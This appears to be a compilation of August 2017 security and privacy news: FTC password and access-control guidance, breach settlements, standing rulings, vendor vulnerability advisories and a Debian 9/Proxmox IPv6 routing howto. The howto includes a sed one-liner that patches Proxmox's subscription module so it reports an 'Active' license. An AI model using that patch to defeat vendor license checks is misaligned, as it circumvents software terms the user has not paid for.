On August 11, 2017, the FTC published the fourth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Require secure passwords and authentication, examines five effective security measures companies can take to safeguard their computer networks.

The practical guidance aims to make it more difficult for hackers to gain unauthorized access to networks. These security measures include:

  • Insisting on long, complex and unique passwords. Companies should establish secure corporate password standards, implement minimum password requirements, and ensure employees are informed about how to create strong passwords. Obvious choices such as “ABCABC” or “qwerty” should be avoided, and users should opt for longer passwords or passphrases when creating their login credentials. Passwords should be unique for each user, and different passwords should be required for different applications. Additionally, default passwords should be changed immediately, and products that require consumers to use a password should prompt them to change the default upon setup.
  • Storing passwords securely. Even the strongest passwords are ineffective if not securely protected. Disclosing a password through phone calls or emails, sharing a password with others or writing a password down without properly storing or disposing of the record may lead to the password being compromised. Compromised passwords that lead to more sensitive data are particularly risky (e.g., a password which provides access to a database of other user credentials). To mitigate these risks, companies should implement policies and procedures to store credentials securely.
  • Guarding against brute force attacks. A brute force attack occurs when hackers use automated programs to systematically guess password combinations. For example, the program may attempt to log in with aaaa1, then aaaa2 and so on until it guesses the right combination. To avoid such attacks, companies should set up their systems to suspend or disable a user account after a certain number of unsuccessful login attempts (see the configuration sketch after this list).
  • Protecting sensitive accounts with more than just a password. For certain kinds of sensitive data, companies may need to take additional steps to protect against hacking. Consumers and employees often reuse usernames and passwords across accounts, and if placed into the wrong hands, this can result in credential stuffing attacks. Such attacks occur when stolen usernames and passwords are input on a large scale into popular internet sites to verify whether they work. To protect against this kind of attack, companies should combine multiple authentication techniques for accounts with access to sensitive data. For example, companies should require verification codes generated by voice call or text, or security keys that need to be inserted into a USB port to grant access. Requiring employees to log into a virtual private network to gain access to systems provides an additional layer of protection.
  • Protecting against authentication bypass. Hackers who cannot gain access to a site through the main login page may try other methods, such as going directly to a network or application that is supposed to be accessible only after the user has signed on. To combat this, companies should ensure that entry is allowed only through a secure authentication point and that there are no backdoors for hackers to target.
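
The lockout guidance above can be implemented many ways. One widely deployed, closely related control is temporarily banning a source IP after repeated failed logins, for instance with the open-source tool fail2ban. A minimal sketch; the thresholds are illustrative, not FTC-prescribed:

# /etc/fail2ban/jail.local (excerpt)
[sshd]
enabled  = true
maxretry = 5      # lock out after 5 failed login attempts...
findtime = 600    # ...within a 10-minute window
bantime  = 3600   # ban the offending IP for 1 hour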

The FTC’s next blog post, to be published on Friday, August 18, will focus on securely storing sensitive personal information and protecting it during transmission.

To read our previous posts documenting the series, see FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

First Enforcement Actions Brought Pursuant to China’s Cybersecurity Law

In the wake of China’s Cybersecurity Law going into effect on June 1, 2017, local authorities in Shantou and Chongqing have brought enforcement actions against information technology companies for violations of the Cybersecurity Law. These are, reportedly, the first enforcement actions brought pursuant to the Cybersecurity Law.

Recently, Chongqing’s municipal Public Security Bureau’s cybersecurity team identified a violation of the Cybersecurity Law during a routine inspection. A technology development company providing internet data center services had failed to retain the web logs of its users’ logins, as required under the Cybersecurity Law. In response, the public security authority issued a warning and an order to correct the issue within 15 days, with a follow-up inspection to take place after the rectification. In another enforcement action, taken by Shantou’s municipal Public Security Bureau’s cybersecurity team in July, an information technology company in Shantou, Guangdong Province, was ordered to correct a violation of the Cybersecurity Law.

Though reportedly the first enforcement actions brought pursuant to the new Cybersecurity Law, these were only minor actions. They involved only warnings and orders to correct the issues; no fines or criminal penalties were imposed. Accordingly, these enforcement actions likely do not provide much insight into how the Cybersecurity Law will be enforced going forward. They do, however, indicate that enforcement authorities, such as the public security agencies and the cyberspace administration agency, have started to consider their roles in enforcing the Cybersecurity Law. More enforcement actions can be expected in the future.

Cisco IOS 15.2(2)e3 Denial Of Service Obtain Information Vulnerability

A vulnerability in the Cisco IOS Software forwarding queue of Cisco 2960X and 3750X switches could allow an unauthenticated, adjacent attacker to cause a memory leak in the software forwarding queue that would eventually lead to a partial denial of service (DoS) condition. More Information: CSCva72252. Known Affected Releases: 15.2(2)E3 15.2(4)E1. Known Fixed Releases: 15.2(2)E6 15.2(4)E3 15.2(5)E1 15.2(5.3.28i)E1 15.2(6.0.49i)E 3.9(1)E.

Enterprise Security Weekly #56 – Tunable Discriminator

Paul and John discuss security policies and procedures. In the news, WatchGuard acquires Datablink, Cylance brings enterprise technology to home users, Oracle and SafeLogic join forces for OpenSSL, 12 security startups that raised new funding in 2017, and more on this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode56

Visit https://www.securityweekly.com for all the latest episodes!

Nationwide Agrees to Pay $5.5 Million to Settle Multistate Data Breach Investigation

On August 9, 2017, Nationwide Mutual Insurance Co. (“Nationwide”) agreed to a $5.5 million settlement with attorneys general from 32 states in connection with a 2012 data breach that exposed the personal information of over 1.2 million individuals. 

The settlement comes on the heels of a multistate investigation into the circumstances surrounding the breach. In October 2012, Nationwide and its affiliate, Allied Property & Casualty Insurance Co. (“Allied”), suffered a breach that resulted in unauthorized access to, and exfiltration of, certain personal information of their customers and other consumers, including names, Social Security numbers, driver’s license numbers, credit scoring data and other data collected to provide quotes to consumers applying for insurance coverage. Attorneys general from the 32 states alleged that the breach occurred when hackers exploited a vulnerability in a third-party web application hosting software used by Nationwide and Allied. According to the attorneys general, Nationwide and Allied had failed to deploy a critical software patch that was released in 2009 to address the vulnerability.

Under the terms of the settlement, Nationwide and Allied agreed to take a series of steps for a period of three years from the effective date of the agreement, including:

  • appointing an individual responsible for managing and monitoring software and application security updates and patches;
  • maintaining an inventory of all systems that process personal information as well as the updates and patches applied to such systems. Nationwide and Allied also must assign a priority level to each new security update and patch under consideration and document the basis for any exceptions;
  • regularly reviewing and updating incident management policies and procedures;
  • maintaining a system management tool that scans systems that process personal information for “common vulnerabilities or exposures” (“CVEs”) and provides near real-time updates regarding known CVEs;
  • purchasing and installing an “automated CVE feed” from a third-party provider;
  • implementing processes and procedures that provide for internal notification, evaluation and documentation of identified CVEs;
  • performing an internal patch management assessment on a semi-annual basis that identifies known CVEs, assigns them a risk rating, confirms appropriate patches have been applied, and documents the basis for any exceptions; and
  • hiring an independent third party to perform a patch management audit on an annual basis.

The settlement further requires Nationwide and Allied to notify consumers that they retain consumers’ personal information, even if those consumers do not become insureds.

D.C. Circuit’s Article III Standing Decision Deepens Appellate Disagreement

On August 1, 2017, a unanimous three-judge panel for the D.C. Circuit reversed the dismissal of a putative data breach class action against health insurer CareFirst, Attias v. CareFirst, Inc., No. 16-7108, slip op. (D.C. Cir. Aug. 1, 2017), finding the risk of future injury was not too speculative to establish injury in fact under Article III. 

The litigation arose from a 2014 data breach involving various types of identifying data. However, the parties disagreed about whether the complaint only alleged the theft of information such as customer names, addresses, and subscriber ID numbers, or whether Social Security numbers and certain payment card information also were exposed. The court found that the complaint did in fact allege the theft of Social Security numbers and payment card information.

Rule 12(b)(1) standing arguments decided on risk of future injury – Declining to decide whether actual fraud had yet occurred, the court nevertheless concluded that the plaintiffs had plausibly alleged a risk of future injury. This future injury was substantial enough to satisfy Article III standing based on, among other things, the data elements actually accessed by hackers on the defendants’ servers, such as Social Security numbers and payment card information. The court’s opinion also identified allegations of “medical identity theft” that was possible with the theft of health insurance subscriber ID numbers alone. According to the court, such allegations “at the very least” created “a plausible allegation that plaintiffs face a substantial risk of identity fraud, even if their [S]ocial [S]ecurity numbers were never exposed.”

Further, and distinguishing the Supreme Court of the United States’ opinion in Clapper v. Amnesty Int’l USA, 568 U.S. 398 (2013), the appellate court found the risk of future harm in the instant case was more substantial because hackers already had accessed customer information and had “both the intent and ability to use that data for ill.” The court also stated that the failure to properly secure customer data, thus subjecting those customers to a substantial risk of identity theft, was “fairly traceable” to the defendants, and that mitigation costs in response to a substantial risk of harm could be redressed with monetary damages.

While the case has been remanded to the district court for further proceedings, it signals that data breach litigants are more likely to weather a standing challenge in specific federal circuits, now including the D.C. Circuit, based solely on allegations of future harm in certain types of data breach cases.

FTC Posts Third Blog in Its “Stick with Security” Series

On August 4, 2017, the FTC published the third blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled “Stick with security: Control access to data sensibly,” details key security measures businesses can take to limit unauthorized access to data in their possession.

The blog post notes that just as business owners lock doors to prevent physical access to business premises and shield company proprietary secrets from unauthorized eyes, they should exercise equal care with respect to access to sensitive customer and employee data.

The post outlines two key security steps companies should take:

  • Restrict Access to Sensitive Data: Employees who don’t use personal information in the course of their employment duties do not need to have access to it. Confidential data in physical form should be secured in a filing cabinet, locked desk drawer or other secure location. Additionally, a clean desk policy minimizes the risk that data may be accessed by an unauthorized person after hours. Digital confidential information can be secured by providing employees with separate user accounts that limit who can view certain files or databases. For example, a staff member in charge of payroll should have password-protected access to a database of employee information (see the short sketch after this list).
  • Limit Administrative Access: While it is essential that a system administrator has the ability to change network settings in a business, this privilege should be limited to a select few people. The FTC compares such access to a bank giving the combination to the central vault to only a few people. By requiring different logins for employees and providing each user with the appropriate system privileges, companies can reduce the risk of having too many employees with administrative rights and avoid untrustworthy administrators.
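
On Unix-like systems, the separate-accounts point can be as simple as group-based file permissions. A minimal sketch; the user name, group name and path are hypothetical:

# Create a payroll group and add only the staff member who needs access
groupadd payroll
usermod -aG payroll alice

# Restrict the payroll data directory to that group; everyone else is locked out
chgrp -R payroll /srv/payroll-db
chmod -R 770 /srv/payroll-db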

The FTC’s next blog post, to be published Friday, August 11, will focus on secure passwords and authentication.

Privacy and Data Security Risks in M&A Transactions: Video Series

In a video roundtable series, Hunton & Williams LLP partners Lisa J. Sotto and Steven M. Haas and special counsel Allen C. Goolsby, along with Stroz Friedberg’s co-president Eric M. Friedberg and Lee Pacchia of Mimesis Law, discuss the special consideration that should be given to privacy and cybersecurity risks in corporate transactions.

In M&A transactions, it is critical for parties to consider the risks and potential liabilities associated with inadequate privacy and cybersecurity practices—whether arising from regulatory violations, actual data breaches or a host of other issues. Even companies that rely less on personal data for their day-to-day operations need to ensure that their company’s confidential and proprietary information is well guarded long before an M&A transaction arises. Buyers need to assess these risks carefully during due diligence because they can be significant and materially affect a buyer’s valuation of a seller’s business. Moreover, issues that are discovered after an M&A transaction is completed could expose companies to massive liabilities such as expensive consumer class action litigation, intrusive government investigations, hefty remediation costs and other expenses.

Watch the full first segment, The Issue and Why It Matters.

Watch the full second segment, How to Prepare and Best Practices.

Additional segments will be released in the coming weeks.

Hack Naked News #135 – August 8, 2017

Shame on Disney, shooting down customer drones, flaws in solar panels, Chrome extensions spreading adware, and more. Doug White of Roger Williams University joins us to discuss hacking back on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode135

Visit https://www.securityweekly.com for all the latest episodes!

MS17-007 – Critical: Cumulative Security Update for Microsoft Edge (4013071) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (August 8, 2017): To comprehensively address CVE-2017-0071, Microsoft released the July security updates for all versions of Windows 10. Note that Windows 10 for 32-bit Systems, Windows 10 for x64-based Systems, Windows 10 Version 1703 for 32-bit Systems, and Windows 10 Version 1703 for x64-based Systems have been added to the Affected Products table as they are also affected by this vulnerability. Microsoft recommends that customers who have not already done so install the July 2017 security updates to be fully protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Edge. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Microsoft Edge. An attacker who successfully exploited these vulnerabilities could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Startup Security Weekly #49 – Speak Your Truth

Glenn Chisholm and Ben Johnson of Obsidian Security join us. In the news, how to keep your head without losing your heart, what aspiring founders need to know, supercharging sales, and how NOT to start a startup. Michael and Paul deliver updates from Callsign, Juvo, Awake Security, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode49

Visit https://www.securityweekly.com for all the latest episodes!

UK Government Releases Statement of Intent Regarding Data Protection Bill

On August 7, 2017, the UK Government’s Department for Culture, Media and Sport published a Statement of Intent setting out the planned reforms to be included in the forthcoming Data Protection Bill, which we previously reported is expected to be laid before the UK Parliament in early September.

The EU General Data Protection Regulation (“GDPR”) is set to become law in the UK on May 25, 2018, without the need for national implementing law. With the UK set to leave the EU in March 2019, however, the Statement of Intent clarifies that the GDPR will be transposed into domestic law to prepare for the UK’s post-Brexit relationship with the EU. The Statement of Intent also sets out the proposed derogations from the GDPR which the UK wishes to implement into UK law, such as:

  • reducing the age at which a child can consent to data processing from 16 to 13 years of age;
  • extending the right to process personal data relating to criminal convictions and offences to enable organizations other than those vested with official authority to process it (taking a similar approach to that for the special categories of personal data);
  • creating an exemption from an individual’s right to object to automated decision making where suitable measures are in place to safeguard individuals’ rights; and
  • exempting processing for scientific or historical research organizations, organizations gathering statistics or organizations performing archiving functions in the public interest where compliance would seriously impair their ability to carry out their work.

The Statement of Intent also makes clear the UK Government is “committed to ensuring the uninterrupted data flows” between the UK, the EU and other countries around the world, which will be welcomed by businesses, both UK and international. In a positive move regarding securing the adequacy decision that would preserve uninterrupted data flows, the Statement of Intent also commits the Data Protection Bill to establishing a suitable data protection framework for the processing of personal data for national security.

The Data Protection Bill also will implement the EU’s Data Protection Law Enforcement Directive, which must be implemented in EU Member States by May 6, 2018.

CISOs Moving Up the Corporate Ladder? CIOs Shouldn’t Be Worried


While Chief Information Security Officers (CISOs) are relatively new members of the C-Suite for many organizations, the continued worries about cybersecurity and data breaches have compelled CEOs and boards to reconsider the positioning of the CISO function in the organizational chart.
CISOs - A Rapid Ascent
According to a Forrester study from 2015, 35% of CISOs now report directly to the CEO or president of the organization. This reality is often a little challenging — if not impossible — for CIOs to digest. After all, why is it that someone who used to report to the CIO just a decade ago now gets unfiltered access to the top leadership, and often special budget lines?
A recent blog post characterizes the evolution of the CISO role thusly: “The Guardian and Technologist is giving way to the Business Strategist, the Business Enabler and the Trusted Advisor, who articulates risk, reviews metrics and reports regularly to the board.”
A January 2017 CIO article reported that organizations where the CISO still reports to the CIO had “14% more downtime due to security incidents.” And while the majority of CISOs still report to CIOs, this situation is fluid and evolving rapidly. A K-Logix study reports that when asked about where CISOs will be reporting in the future, “50% of CISOs responded that the role will report into the CEO.”

So, while it may be tempting for CIOs to see this shift as a loss, the CISO’s rise isn’t something they can do much about, at least given the current threat environment. Instead, CIOs can look at this change in the executive landscape as an opportunity to refocus their role, and rally around causes that are relevant to both CISOs and CIOs.
The CISO as a Potential Ally of the CIO
Choose your battles wisely. After all, life isn't measured by how many times you stood up to fight. It's not winning battles that makes you happy, but it's how many times you turned away and chose to look into a better direction. Life is too short to spend it on warring. Fight only the most, most, most important ones, let the rest go. C. JoyBell C.

For decades, the CIO was often the only technology-minded person in the C-Suite. The rise of the CISO means that the CIO now has a potential ally within earshot of the CEO or the board. Yet CISOs are not seeking to replace CIOs, and CIOs can no longer look at IT risks as falling purely within “their domain.” The digital risk landscape requires a functioning relationship between these two giants of the world of data.

CIOs should grab this opportunity to openly revisit their relationship with the CISO and seek to patch things up, especially any past disagreements that could continue to poison the relationship.
The CISO as a Strategic Partner
While a positive working CIO-CISO relationship is definitely a must, the global marketplace and the ever-increasing cybersecurity risks mean that to be truly effective, the CIO-CISO relationship should be that of a strategic partnership: CIOs and CISOs should forge an alliance to focus both on protecting and enabling the organization through smart, effective investments in security and technology.

For example, AI and cloud are changing the way organizations do business, leveraging on-demand computing and storage to bring cost savings and increased agility, but also presenting new challenges in keeping track of IT risks and preparing for the inevitable breach. By working together strategically, the CIO and CISO can lean on each other to provide, on the one hand, the IT and data infrastructure that keeps the organization running and, on the other, a cyber risk posture kept within acceptable levels, all while maintaining a vigilant eye on the network, devices and data, ready to respond when needed.

The CIO, as an experienced member of the C-Suite, can start building this new level of relationship by offering to share their own lessons learned from joining the top leadership, and by sharing their concerns about the overall digital strategy of the business. For some CIOs, relinquishing control will be more challenging, but one has to pick one’s battles, and the positioning of the CISO isn’t one worth hanging on to, at least not in the interest of the organization and the greater good.

This post was brought to you by IBM Global Technology Services. For more content like this, visit ITBizAdvisor.com

Paul’s Security Weekly #524 – The Secret Sauce

Danny Miller of Ericom Software joins us, Larry and his intern Galen Alderson exfiltrate data from networks with inexpensive hardware, and we discuss the latest security news!

Full Show Notes: https://wiki.securityweekly.com/Episode524

Visit https://www.securityweekly.com for all the latest episodes!

Eaton ELCSoft Vulnerabilities

NCCIC/ICS-CERT is aware of a public report of buffer overflow vulnerabilities affecting Eaton ELCSoft, a PLC programming software for Eaton Logic Control (ELC) controllers. According to the public report, which was coordinated with ICS-CERT prior to its public release, researcher Ariele Caltabiano (kimiya) working with Trend Micro's Zero Day Initiative, identified that an attacker can leverage these vulnerabilities to execute arbitrary code in the context of the process. ICS-CERT has notified the affected vendor, who has reported that they are planning to address the vulnerabilities. No timeline has been provided. ICS-CERT is issuing this alert to provide notice of the report and to identify baseline mitigations for reducing risks to these and other cybersecurity attacks.

UK Government Expected to Present Data Protection Bill in September 2017

Media sources have reported that the UK Department for Culture, Media & Sport has confirmed its plans to present its Data Protection Bill to Parliament when MPs return to Parliament in early September. The Bill follows commitments made in the Queen’s Speech in June, and will effectively copy the EU General Data Protection Regulation (“GDPR”) into the UK statute book. The Bill’s primary aim is to ensure that the UK retains the same data protection laws as the rest of the EU once it leaves the EU, which is likely to be in March 2019.

No details of the proposed Bill have been publicly disclosed to date, so it remains to be seen whether the Bill will add substance to the areas that the GDPR allows to be decided by national law, and whether it will include further clarity on how sanctions will be applied by the UK Information Commissioner’s Office. This would follow Germany’s lead, after the German Federal Parliament in April of this year passed a new German Data Protection Act that adapted current data protection laws to cover derogations from the GDPR’s provisions.

Howto: Set up Debian 9 with Proxmox and containers using as few IPv4 and IPv6 addresses as possible

My current Linux Root-Server needs to be replaced with a newer Linux version and should also be much cheaper than the current one. So first I looked at what I don’t like about the current one:

  • It is expensive at about 70 Euros / month. The following is responsible for that:
    • My own HPE hardware with 16GB RAM and a software RAID (hardware RAID would be even more expensive) – iLO (or something like it) is a must for me 🙂
    • 16 additional IPv4 addresses for the virtualized containers and servers
    • Enough backup space to go back some days.
  • A base OS which makes it hard to run newer Linux versions in the containers (sure, old ones like CentOS 6 still get updates, but that will change)
    • It’s time to move to newer Linux versions in the containers
  • OpenVZ based containers, which are not mainstream anymore

Then I looked at which surrounding conditions have changed since I set up my current server.

  • I have IPv6 at home and 70% of my traffic is IPv6 (thanks to Google (especially YouTube) and Cloudflare)
  • IPv4 addresses got even more expensive for Root-Servers
  • I’m now using Cloudflare for most of the websites I host.
  • Cloudflare is reachable via IPv4 and IPv6 and can connect back to my servers with either IPv4 or IPv6
  • With unprivileged containers, the need to use KVM for security lessens
  • Hosting providers now offer really cheap KVM servers with dedicated reserved CPUs.
  • KVM servers can host containers without a problem

This led to the decision to try the following setup:

  • A KVM-based server for less than 10 Euros / month at Netcup to try the concept
  • No additional IPv4 addresses; everything should work with only 1 IPv4 address and a /64 IPv6 subnet
  • The base OS should be Debian 9 (“Stretch”)
  • For ease of configuration of the containers I will use the current Proxmox with LXC
  • No HTTP reverse proxy of my own; Cloudflare is used exclusively for all websites to translate from IPv4 to IPv6

After that decision was reached, I searched for Howtos which would allow me to just set it up without doing much research. Sadly, that didn’t work out. Sure, there are multiple Howtos which explain how to set up Debian and Proxmox, but when you get to the nifty parts, e.g. using only minimal IP addresses, working around MAC address filters at the hosting providers (which are quite an important security function, BTW) and IPv6, they tell you: you need more IP addresses, you need a really complicated setup, or they just ignore the point altogether.

As you’re reading this blog post, you know that I found a way, so expect a complete documentation on how to set up such a server. I’ll concentrate on the relevant parts to allow you to set up a similar server. Of course I also did some security hardening, like a secure ssh setup with only public keys, the right ciphers, …, which I won’t cover here.

Setting up the OS

I used the Debian 9 minimal install which Netcup provides, changed the password and the hostname, switched the language to English (to be more exact, to C) and moved the SSH port to a non-standard port. The last one I did not so much for security, but because of the constant scans on port 22, which flood the logs.

passwd                     # set a new root password
vim /etc/hosts             # update the hostname/IP mapping
vim /etc/hostname          # set the new hostname
dpkg-reconfigure locales   # switch the locale (I use C)
vim /etc/ssh/sshd_config   # move sshd to a non-standard port
/etc/init.d/ssh restart    # apply the sshd config change
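The sshd change itself is a single line in /etc/ssh/sshd_config (the port number here is just an example, pick your own):

# default is 22; an unused high port cuts down the scanner noise
Port 2222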

I followed that by making sure no firewall is active, and installed net-tools so I have netstat and ifconfig available.

apt install net-tools

Finally, I checked whether any packages need an update.

apt update
apt upgrade

Installing Proxmox

First I checked that the hostname resolves to the correct IP address, as otherwise the install fails and you need to start from scratch.

hostname --ip-address
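In other words, /etc/hosts must map the hostname to the server’s public IP. A sketch with placeholder values:

127.0.0.1       localhost
186.143.121.230 yourhost.example.com yourhost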

Adding the Proxmox Repos to the system and installing the software:

echo "deb http://download.proxmox.com/debian/pve stretch pve-no-subscription" > /etc/apt/sources.list.d/pve-install-repo.list
wget http://download.proxmox.com/debian/proxmox-ve-release-5.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-5.x.gpg
apt update && apt dist-upgrade
apt install proxmox-ve postfix open-iscsi

After that I rebooted into the Proxmox kernel and removed some packages I didn’t need anymore:

apt remove os-prober linux-image-amd64 linux-image-4.9.0-3-amd64

Then I did my first login to the admin GUI at https://<hostname>:8006/ and enabled the Proxmox firewall.

Then I set the firewall rules for protecting the host (I did that for the whole datacenter, even though I only have one server at the moment): ping, the web GUI and ssh are allowed.
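As a rough sketch (not a verbatim copy of my rules), the datacenter firewall config in /etc/pve/firewall/cluster.fw ends up looking something like this:

[OPTIONS]
enable: 1

[RULES]
IN Ping(ACCEPT) # allow ICMP echo
IN ACCEPT -p tcp -dport 8006 # Proxmox web GUI
IN ACCEPT -p tcp -dport 22 # ssh, use your non-standard port here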

I made sure with

iptables -L -xvn

that the firewall was running.

BTW, if you don’t like the nagging window at every login telling you that you need a license, and if this is only a testing machine, as mine currently is, type the following:

sed -i.bak 's/NotFound/Active/g' /usr/share/perl5/PVE/API2/Subscription.pm && systemctl restart pveproxy.service

Now we need to configure the network (vmbr0) for our virtual systems, and this is the point where my Howto goes in a different direction. Normally you’re told to configure vmbr0 and put the physical interface into the bridge. This bridging mode is normally the easiest, but it won’t work here.

Routing instead of bridging

Normally you are told that if you use public IPv4 and IPv6 addresses in containers, you should bridge. Yes, that’s true, but there is one problem: LXC containers have their own MAC addresses. So if they send traffic via the bridge to the datacenter switch, the switch sees the virtual MAC addresses. In an internal company network on a physical host that is normally not a problem, but in a datacenter where different people rent their servers it is not good security practice. Most hosting providers will therefore filter the MAC addresses on the switch (sometimes additional IPv4 addresses come with the right to use additional MAC addresses, but we want to save money here 🙂 ). As this server is a KVM guest OS, the filtering is most likely part of the virtual switch (e.g. for VMware ESX this is even the default).

With ebtables it is possible to configure SNAT for the MAC addresses, but that gets really complicated really fast – trust me on networking stuff: when I say something gets complicated, it gets really complicated fast. 🙂

So, if we can’t use bridging, we need to use routing. Yes, the routing setup on the server is not as easy, but it is clean and simple to understand.

First we configure the physical interface in the admin GUI

Two settings are different from a normal setup. The provider most likely gave you a /23 or /24, but I use a /32 subnet mask (255.255.255.255), as I only want to talk to the default gateway and not to the other servers of other customers. If the switch thinks the traffic is ok, it can reroute it for me. The provider switch will defend its IP address against ARP spoofing – I’m quite sure of that, as otherwise an incorrect configuration by one customer would break the network for all customers, and the provider will make that mistake only once. For IPv6 we do basically the same with a /128, but in this case we also want to reuse the /64 subnet on our second interface.

As I don’t have additional IPv4 addresses, I’ll use a local subnet to provide IPv4 access to the containers (via NAT); the IPv6 address gets configured a second time, this time with the /64 subnet mask. This setup allows us to route with only one /64 – we’re cheap … no extra money needed.

Now we reboot the server so that the /etc/network/interfaces config gets written. We need to add some additional settings there, so that it looks like this:
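A sketch of the relevant part; the 10.0.0.0/24 container subnet and the addresses are placeholders, and the conntrack zone rule shown here is one way to solve the LXC issue described below – adapt everything to your setup:

auto vmbr0
iface vmbr0 inet static
        address 10.0.0.1
        netmask 255.255.255.0
        bridge_ports none
        bridge_stp off
        bridge_fd 0
        # make sure traffic from the containers actually passes the SNAT rule below
        post-up iptables -t raw -I PREROUTING -i fwbr+ -j CT --zone 1
        # simple SNAT of the container subnet to our public IPv4 address
        post-up iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -o ens3 -j SNAT --to-address 186.143.121.230
        # remove both rules again when the network is stopped
        post-down iptables -t raw -D PREROUTING -i fwbr+ -j CT --zone 1
        post-down iptables -t nat -D POSTROUTING -s 10.0.0.0/24 -o ens3 -j SNAT --to-address 186.143.121.230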

The first post-up command is needed to make sure that traffic from the containers actually passes the second one (the SNAT rule) – it’s some kind of LXC specialty. The second command is just a simple SNAT to your public IPv4 address. The last two make sure that the iptables rules get deleted again when you stop the network.

Now we need to make sure that the container traffic gets routed, so we enable forwarding in /etc/sysctl.conf.
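A minimal sketch of the lines in question, assuming the standard forwarding keys:

net.ipv4.ip_forward = 1
net.ipv6.conf.all.forwarding = 1

A quick sysctl -p loads them without a reboot.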

Now we’re almost done. One point remains: the switch/router which is our default gateway needs to be able to send packets to our containers. For IPv6 it does something similar to an ARP request; this is called neighbor discovery, and as the network of the containers is routed, we need to answer those requests on the host system.

Neighbor Discovery Protocol (NDP) Proxy

We could now do this by using proxy_ndp, the IPv6 variant of proxy_arp. First enable proxy_ndp by running:

sysctl -w net.ipv6.conf.all.proxy_ndp=1

You can enable this permanently by adding the following line to /etc/sysctl.conf:

net.ipv6.conf.all.proxy_ndp = 1

Then run:

ip -6 neigh add proxy 2a03:5000:3d:1ee::100 dev ens3

This tells the host Linux system to generate Neighbor Advertisement messages in response to Neighbor Solicitation messages for 2a03:5000:3d:1ee::100 (e.g. our container with ID 100) that arrive through ens3.

While proxy_arp can be used to proxy a whole subnet, this appears not to be the case with proxy_ndp: to protect the memory of upstream routers, you can only proxy defined addresses. That’s not a workable solution if we need to add an entry for every container. But we’re saved from that, as Debian 9 ships with a daemon that can proxy a whole subnet: ndppd. Let’s install and configure it:

apt install ndppd
cp /usr/share/doc/ndppd/ndppd.conf-dist /etc/ndppd.conf

and write a config like this

route-ttl 30000
proxy ens3 {
    router no
    timeout 500
    ttl 30000
    rule 2a03:5000:3d:1ee::/64 {
        auto
    }
}

Now enable it by default and start it:

update-rc.d ndppd defaults
/etc/init.d/ndppd start

Now it is time to boot the system and create your first container.

Container setup

The container setup is easy: you just need to use the Proxmox host as the default gateway.
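In Proxmox terms, the container’s network config (e.g. net0 in /etc/pve/lxc/100.conf) then looks roughly like this; adapt the addresses to whatever you configured on vmbr0 (the values here just follow the sketches above):

net0: name=eth0,bridge=vmbr0,ip=10.0.0.100/24,gw=10.0.0.1,ip6=2a03:5000:3d:1ee::100/64,gw6=2a03:5000:3d:1ee::2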

As you can see, the setup is quite cool and it allows you to create containers without thinking about it. A similar setup is also possible with IPv4 addresses; as I don’t need it, I’ll just quickly describe it here.

Short info for doing the same for an additional IPv4 subnet

The following needs to be added to /etc/network/interfaces:

iface ens3 inet static
pointopoint 186.143.121.1

iface vmbr0 inet static
address 186.143.121.230 # Our host will be the gateway for all containers
netmask 255.255.255.255
# Add all single IPs from your /29 subnet
up route add -host 186.143.34.56 dev vmbr0
up route add -host 186.143.34.57 dev vmbr0
up route add -host 186.143.34.58 dev vmbr0
up route add -host 186.143.34.59 dev vmbr0
up route add -host 186.143.34.60 dev vmbr0
up route add -host 186.143.34.61 dev vmbr0
up route add -host 186.143.34.62 dev vmbr0
up route add -host 186.143.34.63 dev vmbr0
.......

We’re reusing the ens3 IP address. Normally we would add our additional IPv4 network, e.g. a /29. The problem with that straightforward setup would be that we would lose 2 IP addresses (network base and broadcast). Also, the pointopoint directive is important: it tells our host to send all requests to the datacenter IPv4 gateway – even if we want to talk to our neighbors later.

Then for the container setup you just need to replace the IPv4 config with the following:

auto eth0
iface eth0 inet static
address 186.143.34.56 # Any IP of our /29 subnet
netmask 255.255.255.255
gateway 186.143.121.230 # Our host machine will do the job!
pointopoint 186.143.121.1

Hope that saved you some time setting up your own system!

Hack Naked News #134 – August 2, 2017

No more VPNs in Russia, hacking luxury cars, stolen Game of Thrones scripts, your Echo is spying on you, and more. Jason Wood of Paladin Security joins us to discuss Chrome plugin phishing attacks on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode134

Visit https://www.securityweekly.com for all the latest episodes!

FTC Approves Modifications to TRUSTe’s COPPA Safe Harbor Program

On July 31, 2017, the Federal Trade Commission announced that it has approved modifications to TRUSTe’s safe harbor program under the Children’s Online Privacy Protection Rule (the “COPPA Rule”).

The COPPA Rule incorporates a “safe harbor” provision that allows companies and industry groups to seek the FTC’s approval for self-regulatory frameworks that implement “the same or greater protections for children” as those set forth in the COPPA Rule. If a company participates in a self-regulatory framework, it will largely be subject to the enforcement procedures in the safe harbor instead of the FTC investigation and enforcement procedures.

As we previously reported, TRUSTe proposed to modify its safe harbor program to require participants to conduct an annual internal assessment of third parties’ collection of personal information from children on their websites or online services.

The FTC received a handful of comments on TRUSTe’s proposed changes from industry groups and concerned citizens, and ultimately voted 2-0 to approve the modifications to TRUSTe’s safe harbor program.

FTC Posts Second Blog in Its “Stick with Security” Series

On July 28, 2017, the FTC published the second blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled “Start with security – and stick with it,” looks at key security principles that apply to all businesses regardless of their size or the types of data they handle.

The practical guidance offers five steps companies can take to ensure the security of the data they hold and provides examples to illustrate each step.

